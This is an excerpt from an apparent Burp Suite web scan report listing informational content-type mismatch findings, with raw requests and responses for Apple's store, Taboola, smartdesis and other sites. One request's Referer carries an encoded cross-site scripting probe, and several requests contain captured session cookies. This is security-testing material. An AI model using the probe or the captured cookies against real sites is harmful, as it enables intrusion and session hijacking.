GET /Apple/WebObjects/OrderStatus.woa/5134007/wo/ZB4oWsbh0bCLk6bYCPyBtM/0.2.1.0.0.0.29.1.5.15.7.1.5.3.1.0.0 HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 500 Apple
Date: Thu, 03 Feb 2011 18:11:08 GMT
Server: Apache/1.3.41-ps_webdav_01 (Darwin)
content-length: 38
Connection: close
Content-Type: text/html
x-frame-options: sameorigin

An Internal Server Error Has Occurred.

31.72. https://store.apple.com/Apple/WebObjects/OrderStatus.woa/5134007/wo/ZB4oWsbh0bCLk6bYCPyBtM/0.2.1.0.0.0.29.1.5.15.7.13  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://store.apple.com
Path:   /Apple/WebObjects/OrderStatus.woa/5134007/wo/ZB4oWsbh0bCLk6bYCPyBtM/0.2.1.0.0.0.29.1.5.15.7.13

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /Apple/WebObjects/OrderStatus.woa/5134007/wo/ZB4oWsbh0bCLk6bYCPyBtM/0.2.1.0.0.0.29.1.5.15.7.13 HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 500 Apple
Date: Thu, 03 Feb 2011 18:11:13 GMT
Server: Apache/1.3.41-ps_webdav_01 (Darwin)
content-length: 38
Connection: close
Content-Type: text/html
x-frame-options: sameorigin

An Internal Server Error Has Occurred.

31.73. http://storeimages.apple.com/1806/store.apple.com/rs/css/i/aos/cart/cart-options-print.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://storeimages.apple.com
Path:   /1806/store.apple.com/rs/css/i/aos/cart/cart-options-print.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /1806/store.apple.com/rs/css/i/aos/cart/cart-options-print.gif HTTP/1.1
Host: storeimages.apple.com
Proxy-Connection: keep-alive
Referer: http://store.apple.com/us/cart?mco=MTA4NTI1NTY
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; geo=US; s_ria=Flash%2010%7C; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pv=ipod%20-%20index%20(US); s_orientation=%5B%5BB%5D%5D; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D1%2C; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; s_ppv=60%2C60%2C1012%2C; s_orientationHeight=1012; s_cc=true; s_sq=appleusmac%3D%2526pid%253Dmac%252520-%252520index%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.apple.com%25252Fipod%25252F_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 19 Oct 2009 19:13:05 GMT
ETag: "31ed88-141-4adcba41"
Server: Apache/1.3.41-ps_webdav_01 (Darwin)
x-frame-options: sameorigin
Accept-Ranges: bytes
Content-Length: 321
Content-Type: image/gif
Cache-Control: max-age=175
Expires: Thu, 03 Feb 2011 17:53:52 GMT
Date: Thu, 03 Feb 2011 17:50:57 GMT
Connection: close

.PNG
.
...IHDR.......-.....q.1w....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..UI..0..T>.=.&..-....KfkS.q.@..P....x<Q..n....0....x....,`UH^....Z......D....Y..Z.....XJ.. TV.i.\...I'.#F.xR..P|.......n
...[SNIP]...

31.74. http://trc.taboolasyndication.com/dispatch/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://trc.taboolasyndication.com
Path:   /dispatch/

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /dispatch/?publisher=veoh&list-id=rbox-blended&format=json&id=366&list-size=12&uim=rbox-blended&intent=s&item-id=v18978294NGnK88j8&item-type=video&item-url=http%3A//www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8&page-id=252bf48a1c3557304769eba4cb04a734b0b966bf&pv=2&cv=4-6-1-43135-1081071&uiv=default&uploader=bunny12344&v=35284&content-rating=0&external=http%3A//burp/show/11 HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:52:28 GMT
Server: Jetty(6.1.7)
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/plain; charset=utf-8
Set-Cookie: taboola_user_id=4c66d115-8de0-434d-9ff5-5470c9ca620e;Path=/;Expires=Fri, 03-Feb-12 20:52:28 GMT
Set-Cookie: taboola_session_id_veoh=v1_34827fb6eada2a9b2f6ab3438324282f_4c66d115-8de0-434d-9ff5-5470c9ca620e_1296766348_1296766348;Path=/
Set-Cookie: JSESSIONID=.prod2-f2;Path=/
Set-Cookie: taboola_wv_veoh=4501877959146416130;Path=/;Expires=Fri, 03-Feb-12 20:52:28 GMT
Set-Cookie: taboola_rii_veoh=7442879704085952417_1039225080754099931;Path=/;Expires=Fri, 03-Feb-12 20:52:28 GMT
Vary: Accept-Encoding
Connection: close
Content-Length: 9148

trc_json_response =
{"trc":{"user-id":"4c66d115-8de0-434d-9ff5-5470c9ca620e","session-data":"v1_34827fb6eada2a9b2f6ab3438324282f_4c66d115-8de0-434d-9ff5-5470c9ca620e_1296766348_1296766348","video-list
...[SNIP]...

31.75. http://trc.taboolasyndication.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://trc.taboolasyndication.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: taboola_user_id=a72418f5-7573-4033-a20c-768665ba4c71; taboola_session_id_veoh=v1_7d4cc60fd932dcc7937c149c3cdf9f52_a72418f5-7573-4033-a20c-768665ba4c71_1296769481_1296769481; JSESSIONID=.prod2-f3; taboola_wv_veoh=4501877959146416130; taboola_rii_veoh=1039225080754099931_5874168958137325309

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 02:32:27 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 27 Jan 2011 10:14:16 GMT
ETag: "170807e-86-49ad136424e00"
Accept-Ranges: bytes
Content-Length: 134
Connection: close
Content-Type: text/plain; charset=UTF-8

..............p.......(...............................................................................................................

31.76. http://video.od.visiblemeasures.com/log  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://video.od.visiblemeasures.com
Path:   /log

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /log?p=1&m=WiAoXCZDeV18BXB6BA4HdHEDDXMHBR13dAIWJ00IAwsLBnQGA3UFBAB3cB83Vl5dLlkLJw8JFHEHAwpyAgEAcAACBXUODAcLBgRlREd7BgIMdHUPcgQBAHQHc2VWWEUiZwR%2FNkVfBXANAhV2fAYECRRWJlFAM0VVCHJnCwAGFl0gQCNmB39BIjAMCGBWVkwlEAd2MlBRDwgACXUHAnEEAQx3cApjQkNcMwlycwIJAXNyAQl2AgcIdAUCAHQJBQIJAgBzAAR2BwAFcnIJdQcACXEEZCdTTVBmd3dJJ0IKCWJeV0l5DgQHWwpTcFEEcQJUBHMmXCQOBwhxBHN6UABXcncJDSQ%3D HTTP/1.1
Host: video.od.visiblemeasures.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:07:45 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 27 Aug 2010 04:36:15 GMT
ETag: "143a8169-b-48ec6a7b26dc0"
Accept-Ranges: bytes
Content-Length: 11
X-Cnection: close
Content-Type: text/html; charset=UTF-8

objectid=1

31.77. http://videos.smartdesis.com/12948/watch-robo-telugu-movie-online/x22  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://videos.smartdesis.com
Path:   /12948/watch-robo-telugu-movie-online/x22

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /12948/watch-robo-telugu-movie-online/x22 HTTP/1.1
Host: videos.smartdesis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:32:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Vary: Cookie
X-Pingback: http://videos.smartdesis.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=1190ec8918d40851363fa60d5b1876bc; path=/
Last-Modified: Thu, 03 Feb 2011 20:32:37 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 395


<div id="content">

<div class="post">
<h2>Error 404 - Not Found</h2>
       
       <div class="entry">
       <p>Sorry, the page that you are looking for does not exist.</p>    
       </div><!--/entr
...[SNIP]...

31.78. http://videos.smartdesis.com/12962/watch-mahesh-khaleja-movie-online-tc-rip/x22  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://videos.smartdesis.com
Path:   /12962/watch-mahesh-khaleja-movie-online-tc-rip/x22

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /12962/watch-mahesh-khaleja-movie-online-tc-rip/x22 HTTP/1.1
Host: videos.smartdesis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:32:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Vary: Cookie
X-Pingback: http://videos.smartdesis.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=f70cf1b1d146bbdac6f6e4323000a5a0; path=/
Last-Modified: Thu, 03 Feb 2011 20:32:43 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 395


<div id="content">

<div class="post">
<h2>Error 404 - Not Found</h2>
       
       <div class="entry">
       <p>Sorry, the page that you are looking for does not exist.</p>    
       </div><!--/entr
...[SNIP]...

31.79. http://videos.smartdesis.com/13039/watch-ntrs-brindavanam-movie-online-tc-rip/x22  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://videos.smartdesis.com
Path:   /13039/watch-ntrs-brindavanam-movie-online-tc-rip/x22

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /13039/watch-ntrs-brindavanam-movie-online-tc-rip/x22 HTTP/1.1
Host: videos.smartdesis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:32:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Vary: Cookie
X-Pingback: http://videos.smartdesis.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=c8a61672d2ee972f173196ceee739cc4; path=/
Last-Modified: Thu, 03 Feb 2011 20:32:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 395


<div id="content">

<div class="post">
<h2>Error 404 - Not Found</h2>
       
       <div class="entry">
       <p>Sorry, the page that you are looking for does not exist.</p>    
       </div><!--/entr
...[SNIP]...

31.80. http://videos.smartdesis.com/13201/watch-rakht-charitra-2-movie-online/x22  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://videos.smartdesis.com
Path:   /13201/watch-rakht-charitra-2-movie-online/x22

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /13201/watch-rakht-charitra-2-movie-online/x22 HTTP/1.1
Host: videos.smartdesis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:32:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Vary: Cookie
X-Pingback: http://videos.smartdesis.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=ea0ddc1f107ac0ebee15071a4b6732b0; path=/
Last-Modified: Thu, 03 Feb 2011 20:32:37 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 395


<div id="content">

<div class="post">
<h2>Error 404 - Not Found</h2>
       
       <div class="entry">
       <p>Sorry, the page that you are looking for does not exist.</p>    
       </div><!--/entr
...[SNIP]...

31.81. http://videos.smartdesis.com/hindi-online-movies-index/x22  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://videos.smartdesis.com
Path:   /hindi-online-movies-index/x22

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /hindi-online-movies-index/x22 HTTP/1.1
Host: videos.smartdesis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:32:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Vary: Cookie
X-Pingback: http://videos.smartdesis.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=7456e574e55fb97ae5eb9ad3caf48919; path=/
Last-Modified: Thu, 03 Feb 2011 20:32:36 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 395


<div id="content">

<div class="post">
<h2>Error 404 - Not Found</h2>
       
       <div class="entry">
       <p>Sorry, the page that you are looking for does not exist.</p>    
       </div><!--/entr
...[SNIP]...

31.82. http://videos.smartdesis.com/page/2/x22  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://videos.smartdesis.com
Path:   /page/2/x22

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /page/2/x22 HTTP/1.1
Host: videos.smartdesis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:32:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Vary: Cookie
X-Pingback: http://videos.smartdesis.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=4a22e9dc4b28418100a379012fe5689e; path=/
Last-Modified: Thu, 03 Feb 2011 20:32:46 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 395


<div id="content">

<div class="post">
<h2>Error 404 - Not Found</h2>
       
       <div class="entry">
       <p>Sorry, the page that you are looking for does not exist.</p>    
       </div><!--/entr
...[SNIP]...

31.83. http://videos.smartdesis.com/tamil-online-movies-index/x22  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://videos.smartdesis.com
Path:   /tamil-online-movies-index/x22

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /tamil-online-movies-index/x22 HTTP/1.1
Host: videos.smartdesis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:32:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Vary: Cookie
X-Pingback: http://videos.smartdesis.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=080d4866fbd5b5816cc5bbde5d18c081; path=/
Last-Modified: Thu, 03 Feb 2011 20:32:46 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 395


<div id="content">

<div class="post">
<h2>Error 404 - Not Found</h2>
       
       <div class="entry">
       <p>Sorry, the page that you are looking for does not exist.</p>    
       </div><!--/entr
...[SNIP]...

31.84. http://videos.smartdesis.com/telugu-online-movies-index-a/x22  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://videos.smartdesis.com
Path:   /telugu-online-movies-index-a/x22

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /telugu-online-movies-index-a/x22 HTTP/1.1
Host: videos.smartdesis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:32:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Vary: Cookie
X-Pingback: http://videos.smartdesis.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=4c1e6e6a8f7ca1c6adde18d7254993a5; path=/
Last-Modified: Thu, 03 Feb 2011 20:32:36 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 395


<div id="content">

<div class="post">
<h2>Error 404 - Not Found</h2>
       
       <div class="entry">
       <p>Sorry, the page that you are looking for does not exist.</p>    
       </div><!--/entr
...[SNIP]...

31.85. http://videos.smartdesis.com/x22  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://videos.smartdesis.com
Path:   /x22

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /x22 HTTP/1.1
Host: videos.smartdesis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:32:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Vary: Cookie
X-Pingback: http://videos.smartdesis.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=d63972255e4dc639aef9ed15da38a8a8; path=/
Last-Modified: Thu, 03 Feb 2011 20:32:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 395


<div id="content">

<div class="post">
<h2>Error 404 - Not Found</h2>
       
       <div class="entry">
       <p>Sorry, the page that you are looking for does not exist.</p>    
       </div><!--/entr
...[SNIP]...

31.86. http://www.buzzillions.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.buzzillions.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.buzzillions.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=E87D4B444AF0C90074C29DAD4FF5CA63.snowbirdportal; myProductList=BZEMPTY; recentlyViewed=BZEMPTY

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:59:58 GMT
Server: Apache/2.2.9 (Unix)
Last-Modified: Wed, 22 Sep 2010 23:48:40 GMT
ETag: "13e"-gzip
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
Content-Length: 318

..............(.......(....... .......................................#...X...\...................+...r..............................@7wwwwwws.w9ww.wx.w=7s.wq.w....wq.wu..Wwq.w{...wq.w....wq.......q.;
...[SNIP]...

31.87. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /extern/login_status.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
